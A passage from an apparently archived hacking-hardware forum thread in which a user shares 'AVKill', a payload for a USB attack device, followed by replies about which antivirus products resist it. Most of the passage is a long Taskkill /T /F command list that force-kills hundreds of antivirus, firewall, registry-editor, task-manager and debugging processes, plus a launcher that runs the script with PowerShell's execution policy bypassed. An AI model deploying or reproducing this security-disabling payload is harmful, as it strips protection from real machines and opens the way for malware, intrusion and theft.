/IM dpf.exe /IM dpfsetup.exe /IM dpps2.exe /IM drwatson.exe /IM drweb32.exe /IM drwebupw.exe /IM dssagent.exe /IM dvp95.exe /IM dvp95_0.exe /IM ecengine.exe Taskkill /T /F /IM efpeadm.exe /IM emsw.exe /IM ent.exe /IM esafe.exe /IM escanhnt.exe /IM escanv95.exe /IM espwatch.exe /IM ethereal.exe /IM etrustcipe.exe /IM evpn.exe Taskkill /T /F /IM exantivirus-cnet.exe /IM exe.avxw.exe /IM expert.exe /IM explore.exe /IM f-agnt95.exe /IM f-prot.exe /IM f-prot95.exe /IM f-stopw.exe /IM fameh32.exe /IM fast.exe Taskkill /T /F /IM fch32.exe /IM fih32.exe /IM findviru.exe /IM firewall.exe /IM fnrb32.exe /IM fp-win.exe /IM fp-win_trial.exe /IM fprot.exe /IM frw.exe /IM fsaa.exe /IM fsav.exe Taskkill /T /F /IM fsav32.exe /IM fsav530stbyb.exe /IM fsav530wtbyb.exe /IM fsav95.exe /IM fsgk32.exe /IM fsm32.exe /IM fsma32.exe /IM fsmb32.exe /IM gator.exe /IM gbmenu.exe Taskkill /T /F /IM gbpoll.exe /IM generics.exe /IM gmt.exe /IM guard.exe /IM guarddog.exe /IM hacktracersetup.exe /IM hbinst.exe /IM hbsrv.exe /IM hotactio.exe /IM hotpatch.exe Taskkill /T /F /IM htlog.exe /IM htpatch.exe /IM hwpe.exe /IM hxdl.exe /IM hxiul.exe /IM iamapp.exe /IM iamserv.exe /IM iamstats.exe /IM ibmasn.exe /IM ibmavsp.exe /IM icload95.exe Taskkill /T /F /IM icloadnt.exe /IM icmon.exe /IM icsupp95.exe /IM icsuppnt.exe /IM idle.exe /IM iedll.exe /IM iedriver.exe /IM iexplorer.exe /IM iface.exe /IM ifw2000.exe Taskkill /T /F /IM inetlnfo.exe /IM infus.exe /IM infwin.exe /IM init.exe /IM intdel.exe /IM intren.exe /IM iomon98.exe /IM istsvc.exe /IM jammer.exe /IM jdbgmrg.exe /IM jedi.exe Taskkill /T /F /IM kavlite40eng.exe /IM kavpers40eng.exe /IM kavpf.exe /IM kazza.exe /IM keenvalue.exe /IM kerio-pf-213-en-win.exe /IM kerio-wrl-421-en-win.exe /IM kerio-wrp-421-en-win.exe Taskkill /T /F /IM kernel32.exe /IM killprocesssetup161.exe /IM launcher.exe /IM ldnetmon.exe /IM ldpro.exe /IM ldpromenu.exe /IM ldscan.exe /IM lnetinfo.exe /IM loader.exe Taskkill /T /F /IM localnet.exe /IM lockdown.exe /IM lockdown2000.exe /IM lookout.exe /IM lordpe.exe /IM lsetup.exe /IM luall.exe /IM luau.exe /IM lucomserver.exe /IM luinit.exe Taskkill /T /F /IM luspt.exe /IM mapisvc32.exe /IM mcagent.exe /IM mcmnhdlr.exe /IM mcshield.exe /IM mctool.exe /IM mcupdate.exe /IM mcvsrte.exe /IM mcvsshld.exe /IM md.exe Taskkill /T /F /IM mfin32.exe /IM mfw2en.exe /IM mfweng3.02d30.exe /IM mgavrtcl.exe /IM mgavrte.exe /IM mghtml.exe /IM mgui.exe /IM minilog.exe /IM mmod.exe /IM monitor.exe Taskkill /T /F /IM moolive.exe /IM mostat.exe /IM mpfagent.exe /IM mpfservice.exe /IM mpftray.exe /IM mrflux.exe /IM msapp.exe /IM msbb.exe /IM msblast.exe /IM mscache.exe Taskkill /T /F /IM msccn32.exe /IM mscman.exe /IM msconfig.exe /IM msdm.exe /IM msdos.exe /IM msiexec16.exe /IM msinfo32.exe /IM mslaugh.exe /IM msmgt.exe /IM msmsgri32.exe Taskkill /T /F /IM mssmmc32.exe /IM mssys.exe /IM msvxd.exe /IM mu0311ad.exe /IM mwatch.exe /IM n32scanw.exe /IM nav.exe /IM navap.navapsvc.exe /IM navapsvc.exe /IM navapw32.exe Taskkill /T /F /IM navdx.exe /IM navlu32.exe /IM navnt.exe /IM navstub.exe /IM navw32.exe /IM navwnt.exe /IM nc2000.exe /IM ncinst4.exe /IM ndd32.exe /IM neomonitor.exe Taskkill /T /F /IM neowatchlog.exe /IM netarmor.exe /IM netd32.exe /IM netinfo.exe /IM netmon.exe /IM netscanpro.exe /IM netspyhunter-1.2.exe /IM netstat.exe /IM netutils.exe Taskkill /T /F /IM nisserv.exe /IM nisum.exe /IM nmain.exe /IM nod32.exe /IM normist.exe /IM norton_internet_secu_3.0_407.exe /IM notstart.exe /IM npf40_tw_98_nt_me_2k.exe Taskkill /T /F /IM npfmessenger.exe /IM nprotect.exe /IM npscheck.exe /IM npssvc.exe /IM nsched32.exe /IM nssys32.exe /IM nstask32.exe /IM nsupdate.exe /IM nt.exe /IM ntrtscan.exe Taskkill /T /F /IM ntvdm.exe /IM ntxconfig.exe /IM nui.exe /IM nupgrade.exe /IM nvarch16.exe /IM nvc95.exe /IM nvsvc32.exe /IM nwinst4.exe /IM nwservice.exe /IM nwtool16.exe Taskkill /T /F /IM ollydbg.exe /IM onsrvr.exe /IM optimize.exe /IM ostronet.exe /IM otfix.exe /IM outpost.exe /IM outpostinstall.exe /IM outpostproinstall.exe /IM padmin.exe Taskkill /T /F /IM panixk.exe /IM patch.exe /IM pavcl.exe /IM pavproxy.exe /IM pavsched.exe /IM pavw.exe /IM pccwin98.exe /IM pcfwallicon.exe /IM pcip10117_0.exe /IM pcscan.exe Taskkill /T /F /IM pdsetup.exe /IM periscope.exe /IM persfw.exe /IM perswf.exe /IM pf2.exe /IM pfwadmin.exe /IM pgmonitr.exe /IM pingscan.exe /IM platin.exe /IM pop3trap.exe Taskkill /T /F /IM poproxy.exe /IM popscan.exe /IM portdetective.exe /IM portmonitor.exe /IM powerscan.exe /IM ppinupdt.exe /IM pptbc.exe /IM ppvstop.exe /IM prizesurfer.exe Taskkill /T /F /IM prmt.exe /IM prmvr.exe /IM procdump.exe /IM processmonitor.exe /IM procexplorerv1.0.exe /IM programauditor.exe /IM proport.exe /IM protectx.exe /IM pspf.exe Taskkill /T /F /IM purge.exe /IM qconsole.exe /IM qserver.exe /IM rapapp.exe /IM rav7.exe /IM rav7win.exe /IM rav8win32eng.exe /IM ray.exe /IM rb32.exe /IM rcsync.exe /IM realmon.exe Taskkill /T /F /IM reged.exe /IM regedit.exe /IM regedt32.exe /IM rescue.exe /IM rescue32.exe /IM rrguard.exe /IM rshell.exe /IM rtvscan.exe /IM rtvscn95.exe /IM rulaunch.exe Taskkill /T /F /IM run32dll.exe /IM rundll.exe /IM rundll16.exe /IM ruxdll32.exe /IM safeweb.exe /IM sahagent.exe /IM save.exe /IM savenow.exe /IM sbserv.exe /IM sc.exe /IM scam32.exe Taskkill /T /F /IM scan32.exe /IM scan95.exe /IM scanpm.exe /IM scrscan.exe /IM serv95.exe /IM setup_flowprotector_us.exe /IM setupvameeval.exe /IM sfc.exe /IM sgssfw32.exe Taskkill /T /F /IM sh.exe /IM shellspyinstall.exe /IM shn.exe /IM showbehind.exe /IM smc.exe /IM sms.exe /IM smss32.exe /IM soap.exe /IM sofi.exe /IM sperm.exe /IM spf.exe Taskkill /T /F /IM sphinx.exe /IM spoler.exe /IM spoolcv.exe /IM spoolsv32.exe /IM spyxx.exe /IM srexe.exe /IM srng.exe /IM ss3edit.exe /IM ssg_4104.exe /IM ssgrate.exe /IM st2.exe Taskkill /T /F /IM start.exe /IM stcloader.exe /IM supftrl.exe /IM support.exe /IM supporter5.exe /IM svc.exe /IM svchostc.exe /IM svchosts.exe /IM svshost.exe /IM sweep95.exe Taskkill /T /F /IM sweepnet.sweepsrv.sys.swnetsup.exe /IM symproxysvc.exe /IM symtray.exe /IM sysedit.exe /IM system.exe /IM system32.exe /IM sysupd.exe /IM taskmg.exe /IM taskmgr.exe Taskkill /T /F /IM taskmo.exe /IM taskmon.exe /IM taumon.exe /IM tbscan.exe /IM tc.exe /IM tca.exe /IM tcm.exe /IM tds-3.exe /IM tds2-98.exe /IM tds2-nt.exe /IM teekids.exe Taskkill /T /F /IM tfak.exe /IM tfak5.exe /IM tgbob.exe /IM titanin.exe /IM titaninxp.exe /IM tracert.exe /IM trickler.exe /IM trjscan.exe /IM trjsetup.exe /IM trojantrap3.exe Taskkill /T /F /IM tsadbot.exe /IM tvmd.exe /IM tvtmd.exe /IM undoboot.exe /IM updat.exe /IM update.exe /IM upgrad.exe /IM utpost.exe /IM vbcmserv.exe /IM vbcons.exe Taskkill /T /F /IM vbust.exe /IM vbwin9x.exe /IM vbwinntw.exe /IM vcsetup.exe /IM vet32.exe /IM vet95.exe /IM vettray.exe /IM vfsetup.exe /IM vir-help.exe /IM virusmdpersonalfirewall.exe Taskkill /T /F /IM vnlan300.exe /IM vnpc3000.exe /IM vpc32.exe /IM vpc42.exe /IM vpfw30s.exe /IM vptray.exe /IM vscan40.exe /IM vscenu6.02d30.exe /IM vsched.exe /IM vsecomr.exe Taskkill /T /F /IM vshwin32.exe /IM vsisetup.exe /IM vsmain.exe /IM vsmon.exe /IM vsstat.exe /IM vswin9xe.exe /IM vswinntse.exe /IM vswinperse.exe /IM w32dsm89.exe /IM w9x.exe Taskkill /T /F /IM watchdog.exe /IM webdav.exe /IM webscanx.exe /IM webtrap.exe /IM wfindv32.exe /IM whoswatchingme.exe /IM wimmun32.exe /IM win-bugsfix.exe /IM win32.exe Taskkill /T /F /IM win32us.exe /IM winactive.exe /IM window.exe /IM windows.exe /IM wininetd.exe /IM wininitx.exe /IM winlogin.exe /IM winmain.exe /IM winnet.exe /IM winppr32.exe Taskkill /T /F /IM winrecon.exe /IM winservn.exe /IM winssk32.exe /IM winstart.exe /IM winstart001.exe /IM wintsk32.exe /IM winupdate.exe /IM wkufind.exe /IM wnad.exe /IM wnt.exe Taskkill /T /F /IM wradmin.exe /IM wrctrl.exe /IM wsbgate.exe /IM wupdater.exe /IM wupdt.exe /IM wyvernworksfirewall.exe /IM xpf202en.exe /IM zapro.exe /IM zapsetup3001.exe Taskkill /T /F /IM zatutor.exe /IM zonalm2601.exe /IM zonealarm.exe And to make it all come together. start.cmd @echo off cls REM Change AVKill.ps1 to AVKill.cmd if you prefer batch based files. powershell.exe -executionpolicy bypass "%~dp0\AVKill.ps1" >NUL @exit Until next time, when I get some more free time.. Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted September 19, 2017 Share Posted September 19, 2017 Interesting. Isn't the AV meant to stop scripts from running? Why can't it stop this one? Also, some AVs don't allow you to stop them (e.g. Trend Micro comes up with the password thing when you try and kill it). Link to comment Share on other sites More sharing options...
InfoSecREDD Posted September 19, 2017 Author Share Posted September 19, 2017 Lol that's the reason for 1.2.1.. Had alot of fun rewriting it.. Pretty much if it's the .cmd version it doesn't kill CMD.. if it's the .ps1 version it doesn't kill PowerShell. I use this actually as a header to some scripts I have, just thought it's "appropriate" to post this time. Lol. Link to comment Share on other sites More sharing options...
JediMasterX Posted September 20, 2017 Share Posted September 20, 2017 THANK YOU... started beliving the forum is dead lol... will try it out asap (bought my second bunny for no real reason and still have not used it such a NOOB) JMX Link to comment Share on other sites More sharing options...
InfoSecREDD Posted September 20, 2017 Author Share Posted September 20, 2017 Nah we are very much alive.. but my BashBunny just bricked so I'm out of Development for the moment. Link to comment Share on other sites More sharing options...
InfoSecREDD Posted September 21, 2017 Author Share Posted September 21, 2017 Well good news, Support is gonna send me a new BashBunny. So I can continue to give you guys payloads.. yay... Lol.. Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted September 21, 2017 Share Posted September 21, 2017 1 hour ago, Ar1k88 said: Well good news, Support is gonna send me a new BashBunny. So I can continue to give you guys payloads.. yay... Lol.. Nice! Good to hear it. Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted September 21, 2017 Share Posted September 21, 2017 Avast and Vipre will not be affected by this. Avast processes deny even system level access from killing them. The service will prompt if you try and stop or kill it in any way. The BB could do it but it will need a quack command to manually click yes after trying to stop it. Link to comment Share on other sites More sharing options...
JediMasterX Posted October 2, 2017 Share Posted October 2, 2017 Glad to hear you are getting another bb. So funny that hak5 forum, and all my learning is like meeting with a secret love, im feeling 16yo again hehe. RL is too damnding... lolz JMX Link to comment Share on other sites More sharing options...
JediMasterX Posted October 19, 2017 Share Posted October 19, 2017 Seems to fail on Eset Sec 10, trying to figure out why... Link to comment Share on other sites More sharing options...
Dviros Posted November 6, 2017 Share Posted November 6, 2017 Hi, What about AV's that are running as SYSTEM? It cannot be killed even when running as an admin. Link to comment Share on other sites More sharing options...
Dviros Posted November 6, 2017 Share Posted November 6, 2017 Also, here's my syntax: (I cannot paste it over here)https://pastebin.com/G8PAJLxG Link to comment Share on other sites More sharing options...
InfoSecREDD Posted November 13, 2017 Author Share Posted November 13, 2017 On 11/5/2017 at 11:39 PM, Dviros said: Also, here's my syntax: (I cannot paste it over here)https://pastebin.com/G8PAJLxG I like that.. I've been super busy with my work but I'm currently looking on leaving.. So more time for me to code.. This was just a rework of the Ruby metasploit avkill post exploit script.. But I agree it needs to be worked on. :) Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.